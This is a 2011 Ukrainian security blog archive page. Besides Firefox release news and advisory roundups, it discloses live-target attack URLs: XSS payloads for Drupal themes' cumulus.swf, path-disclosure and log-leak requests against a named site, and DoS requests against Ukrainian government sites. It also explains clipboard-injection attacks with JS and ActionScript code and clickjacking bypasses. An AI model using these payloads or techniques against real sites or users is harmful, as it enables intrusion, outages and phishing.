Вийшов Mozilla Firefox 7

19:14 04.10.2011

На минулому тижні, 28.09.2011, вийшов Mozilla Firefox 7. Нова версія браузера вийшла через півтора місяця після виходу Firefox 6 і через 22 доби після виходу Firefox 6.0.2.

Mozilla офіційно представила реліз веб браузера Firefox 7.0, до складу якого включені давно очікувані наробітки по скороченню споживання пам’яті. Випуск Firefox 8 очікується через 6 тижнів, у середині листопада, а Firefox 9 вийде наприкінці року. Крім того, також були випущені Firefox 3.6.23, Firefox 7 for Android, Seamonkey 2.4 і Thunderbird 7.0.

Додам, що вже 29.09.2011 Мозіла випустила Firefox 7.0.1, в якому виправила проблему з доповненнями до браузера (що зникали в версії 7.0).

Зазначу, що окрім нововведень і виправлення помилок у Firefox 7.0 і Firefox 3.6.23 усунути численні уразливості. Усього усунуто 10 уразливостей, з яких 8 мають критичний характер і можуть привести до виконання коду зловмисника при відкритті спеціально створених сторінок.

  • Релиз Firefox 7.0 и сопутствующих проектов Mozilla (деталі)

Добірка уразливостей

15:02 04.10.2011

В даній добірці уразливості в веб додатках:

  • HP Network Automation Running on Linux, Solaris, and Windows, Remote Information Disclosure (деталі)
  • Path disclosure in Tribiq CMS (деталі)
  • HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in xtcModified (деталі)
  • Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability (деталі)
  • XSS vulnerability in xtcModified (деталі)
  • Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified Communications Manager (деталі)
  • XSS vulnerability in xtcModified (деталі)
  • RSA, The Security Division of EMC, announces a fix for a security vulnerability in RSA Data Loss Prevention (деталі)
  • XSS vulnerability in xtcModified (деталі)

Уразливість в багатьох темах для Drupal

23:51 01.10.2011

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron. А також писав про аналогічну уразливість в багатьох плагінах для різних движків, в тому числі в Cumulus для Drupal.

Така ж уразливість є і в багатьох темах для Drupal, що використовують cumulus.swf (це той самий файл tagcloud.swf розроблений автором WP-Cumulus). Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в багатьох темах для Drupal. Зокрема вразливі теми Admire Grunge, Morok, Pushbutton, Danland і Analytic. Всі теми для Друпал (як і для інших движків), що використовують дану флешку, є вразливими. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії тем Admire Grunge, Morok, Pushbutton, Danland і Analytic для Drupal.

Численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey

22:40 01.10.2011

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 3.6, Firefox 6.0, Thunderbird 6.0, SeaMonkey 2.3.

Численні пошкодження пам’яті, міжсайтовий скриптинг, виконання коду.

  • Mozilla Foundation Security Advisory 2011-36 (деталі)
  • Mozilla Foundation Security Advisory 2011-37 (деталі)
  • Mozilla Foundation Security Advisory 2011-38 (деталі)
  • Mozilla Foundation Security Advisory 2011-39 (деталі)
  • Mozilla Foundation Security Advisory 2011-40 (деталі)
  • Mozilla Foundation Security Advisory 2011-41 (деталі)
  • Mozilla Foundation Security Advisory 2011-42 (деталі)
  • Mozilla Foundation Security Advisory 2011-43 (деталі)
  • Mozilla Foundation Security Advisory 2011-44 (деталі)
  • Mozilla Foundation Security Advisory 2011-45 (деталі)

Нові уразливості на www.hackerscenter.com

20:05 01.10.2011

04.01.2011

У вересні, 21.09.2010, я знайшов Full path disclosure та Information Leakage уразливості на хакерському сайті http://www.hackerscenter.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.hackerscenter.com.

Детальна інформація про уразливості з’явиться пізніше.

01.10.2011

Full path disclosure:

http://www.hackerscenter.com/index.php?/component/option,com_mailto/link,='

Та інші “атакуючі” запити до сайта (такі як з одинарною лапкою).

http://www.hackerscenter.com/hscids/lib/IDS/Log/File.php

Information Leakage:

http://www.hackerscenter.com/hscids/lib/IDS/tmplogs/phpids_log.txt

Витік всього лога.

Дані уразливості досі не виправлені.

Переможці Pwnie Awards 2011

15:22 01.10.2011

На початку серпня на конференції BlackHat USA в Лас Вегасі були оголошені переможці Pwnie Awards 2011 - Pwnie Award Winners. 03.08.2011 імена переможців в усіх категоріях було оприлюднено на сайті.

Цьогорічні переможці Pwnie Awards.

Pwnie for Best Server-Side Bug:

  • ASP.NET Framework Padding Oracle (Juliano Rizzo, Thai Duong)

Pwnie for Best Client-Side Bug:

  • FreeType vulnerability in iOS (Comex)

Pwnie for Best Privilege Escalation Bug:

  • Windows kernel win32k user-mode callback vulnerabilities (Tarjei Mandt)

Pwnie for Most Innovative Research:

  • Securing the Kernel via Static Binary Rewriting and Program Shepherding (Piotr Bania)

Pwnie for Lifetime Achievement:

  • pipacs/PaX Team

Lamest Vendor Response:

  • RSA SecurID token compromise (RSA)

Pwnie for Best Song:

  • The Light It Up Contest (Geohot)

Pwnie for Most Epic FAIL:

  • Sony за п’ять епічних фейлів

Pwnie for Epic 0wnage:

  • Stuxnet

Можете ознайомитися з переможцями Pwnie Awards 2010.

Уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua

23:56 30.09.2011

23.12.2010

У вересні, 11.09.2010, я знайшов Denial of Service уразливість на http://www.kvs.gov.ua - сайті Державного департаменту України з питань виконання покарань. Також подібну уразливість я виявив на державних сайтах www.dcz.gov.ua та www.kmu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kvs.gov.ua, www.dcz.gov.ua та www.kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.09.2011

DoS:

http://www.kvs.gov.ua/punish/cewolf?img=1&width=10000&height=10000
http://www.dcz.gov.ua/chn/cewolf?img=1&width=10000&height=10000
http://www.kmu.gov.ua/punish/cewolf?img=1&width=10000&height=10000

На сайтах Державного департаменту України з питань виконання покарань (www.kvs.gov.ua) та Кабінету Міністрів України (www.kmu.gov.ua) дана уразливість вже виправлена. Але не на сайті Державної служби зайнятості України (www.dcz.gov.ua). А також є ще багато інших уразливих сайтів (включаючи gov.ua сайти) на дірявому Megapolis.Portal Manager.

Атаки через буфер обміну

22:43 30.09.2011

Розповім вам про атаки через буфер обміну (attacks via clipboard). Концепція яких в мене виникла вже багато років тому, після того як я стикнувся з XSS, що вимагала вставки даних з буферу. І наведу вам методику проведення таких атак через JS і Flash.

Раніше я вже писав про Cross-Site Scripting уразливості в формах, де я розповідав про XSS атаки на форми, як reflected XSS, так і persistent XSS. Подібні уразливості я знаходив на багатьох сайтах і в багатьох веб додатках в 2007-2011 роках. Але окрім них, ще бувають strictly social XSS в формах, коли потрібно змусити жертву скопіювати в буфер обміну спеціальний код і вставити його з буфера для проведення атаки - такі уразливості я знаходив ще в 2006 році. Про що я писав в статті Міжмовний XSS - Cross-Language Scripting. І використання даної методики дозволить вирішити першу частину задачі - копіювання коду в буфер, а далі залишиться лише змусити жертву вставити з буфера для проведення атаки.

Існує можливість в браузері заносити дані в буфер обміну. Зокрема, це можна зробити через JavaScript та Flash. Зчитувати з буфера обміну не можна (це зроблено з метою безпеки), зате можна заносити дані в буфер (бо в цьому розробники не вбачають небезпеки). Що може бути використано для атаки.

Використовуючи функцію копіювання в буфер обміну можна проводити різні атаки, зокрема Cross-Site Scripting і Cross-Application Scripting, а також спам, фішинг і malware атаки. Наприклад, для проведення XSS атаки коли треба вставити код з буфера обміну в текстове поле. Або CAS коли якийсь додаток має переповнення буфера в якомусь полі (при вставці даних в це поле), і можна занести в браузері в буфер необхідний код, після вставки якого з буферу в поле відбудеться DoS чи Code Execution атака. Або можна заносити шкідливі програми (зокрема exe-файли) для викачування в качалки, що моніторять буфер обміну. І якщо в них задане автоматичне викачування файлів, то дане шкідливе ПЗ буде викачане автоматично (Automatic File Download).

Також можна занести в буфер обміну URL довільного сайта - з метою спаму, фішинга чи розповсюдження malware. Наприклад, деякі сайти автоматично копіюють адресу поточної сторінки сайта - для зручності відвідувачів. Щоб людина вставляючи з буфера адресу в браузер, випадково вставила не ту адресу, яку вона раніше скопіювала, а ту, яку їй підсунули, щоб вона перейшла на вказаний сайт. Який може бути як рекламним, так і фішинг ресурсом, або сайтом зі шкідливим кодом. Це кліпбоардний фішинг / кліпбоардний спам (clipboard phishing / clipboard spamming) і дані атаки можуть бути більш ефективними ніж атаки через закладки та стартову сторінку (про які я писав в статтях Темна сторона закладок та Темний дім в 2009 році).

При використанні JavaScript можна копіювати лише в IE. При використанні Flash - в будь-якому браузері з флеш-плагіном. Можливість працювати з буфером обміну з’явилася в Flash 7 (ActionScript 1) і була оновлена в Flash 10 (ActionScript 3), тому для атаки потрібно, щоб у користувача була відповідна версія флеш-плагіна (в залежності від використаного коду).

Для надійності варто використовувати AS1 (при копіюванні текстових даних), щоб код спрацював в користувачів як нових, так і старих версій флеш-плагіна (а також тих, хто буде запускати swf-файл в стаціонарному флеш-плеєрі). А також атака через флеш спрацює, коли у користувача вимкнутий JavaScript (що дозволить обійти відповідний захист, наприклад, NoScript чи тимчасове вимкнення JS). З іншої сторони, враховуючи, що після появи в 2008 році заяв про можливість підсовувати шкідливі лінки користувачам та виявлення флеш-банерів, що проводили подібні атаки, Adobe внесла зміни в флеш плеєр починаючи з версії 10.0, тому для атаки в браузері потрібна взаємодія з користувачем (при цьому при запуску флешки в стаціонарному флеш плеєрі атака автоматично спрацює в усіх флеш плеєрах версії 7.0 і вище).

Але в деяких користувачів може бути відсутній чи тимчасово вимкнутий флеш плагін, тому для більш надійної атаки варто використовувати комбінований метод JS + Flash (тобто поєднати обидва методи атаки). Флеш дозволяє провести атаку кросбраузерно і в різних ОС, зате JS дозволяє провести атаку на користувачів, хоча й тільки Internet Explorer, в яких немає флеш плагіна (або використовується стара версія), а також він не має обмежень на запис до буферу (які з’явилися в Flash 10.0). Тому варто об’єднати сильні сторони обох методів.

Приклад JS коду для IE:

<script>window.clipboardData.setData('text','XSS');</script>

Приклад AS1 коду:

System.setClipboard("XSS");

Приклад AS3 коду:

import flash.desktop.ClipboardFormats;
Clipboard.generalClipboard.setData(ClipboardFormats.TEXT_FORMAT, "XSS");

Також можна в JS і AS зробити циклічне копіювання в буфер (наприклад, кожної хвилини). Що дозволить провести постійну (persistent) атаку через буфер обміну, коли користувачу увесь час, доки відкрита сторінка з атакуючим кодом, буде підсовуватися в буфер необхідний код.

При цьому слід зазначити, що починаючи з Flash 10.0 Адоб обмежила функціонал роботи з буфером обміну, що існував до цього (для покращення безпеки після появи в 2008 році вірусних флешек, що проводили атаки через буфер). І тепер необхідна взаємодія з користувачем, тобто необхідно, щоб користувач зробив дії мишею чи клавіатурою. Але при атаці на користувачів нових версій флеш плеєра (флеш плагіна) це можна обійти за допомогою Clickjacking, зокрема можна використати флешку ZeroClipboard (або зробити аналогічний алгоритм, без використання JS, а лише AS) в парі з Clickjacking. Або з MouseOverJacking. Наявність цієї можливості демонструє, що виправлення Adobe для роботи з буфером у Флеш 10 обходиться і дана атака все ще можлива.

В тіло даної сторінки включений JS-код (з вищенаведеним кодом для IE), що заніс в ваш буфер рядок “XSS”. А також була включена флешка, що призначена для флеш плеєра 9 та попередніх версій (але в 2023 році я прибрав swf файл). Що ви самі можете перевірити ;-) .

Вийшли Mozilla Firefox 6.0.1 і 6.0.2

20:13 30.09.2011

Після виходу Mozilla Firefox 6, Mozilla випустила два оновлення для шостої гілки Firefox - 6.0.1 і 6.0.2. Після чого нещадавно випустила сьому версію браузера. Для порівняння, для гілки Firefox 5.0 не було зроблено секюріті оновлень (була лише випущена версія 5.0.1 для Mac OS X без секюріті виправлень) і одразу була випущена шоста версія (з секюріті виправленнями).

Mozilla Firefox 6.0.1 вийшов 30.08.2011, а Firefox 6.0.2 вийшов 06.09.2011. В даних версіях браузера були зроблені наступні покращення:

  • В Firefox 6.0.1 був доданий захист від підроблених сертифікатів DigiNotar.
  • В Firefox 6.0.2 був доданий додатковий захист від підроблених сертифікатів DigiNotar.

Добірка уразливостей

15:01 30.09.2011

В даній добірці уразливості в веб додатках:

  • HP Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS) (деталі)
  • CubeCart 2.0.6 SQL injection / Cross Site Scripting (деталі)
  • Cross-site scripting (XSS) vulnerabilities in KDE-Libs (деталі)
  • Prestashop Cartium 1.3.3 Multiple Cross Site Scripting (XSS) (деталі)
  • HP Proliant Support Pack (PSP) Running on Linux and Windows, Remote Cross Site Scripting (XSS), URL Redirection, Information Disclosure (деталі)
  • XSRF (CSRF) in Pragyan CMS (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Unauthorized Access, Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
  • XSS vulnerability in Pragyan CMS (деталі)
  • Security Notice for CA Arcot WebFort Versatile Authentication Server (деталі)
  • XSS vulnerability in Pragyan CMS (деталі)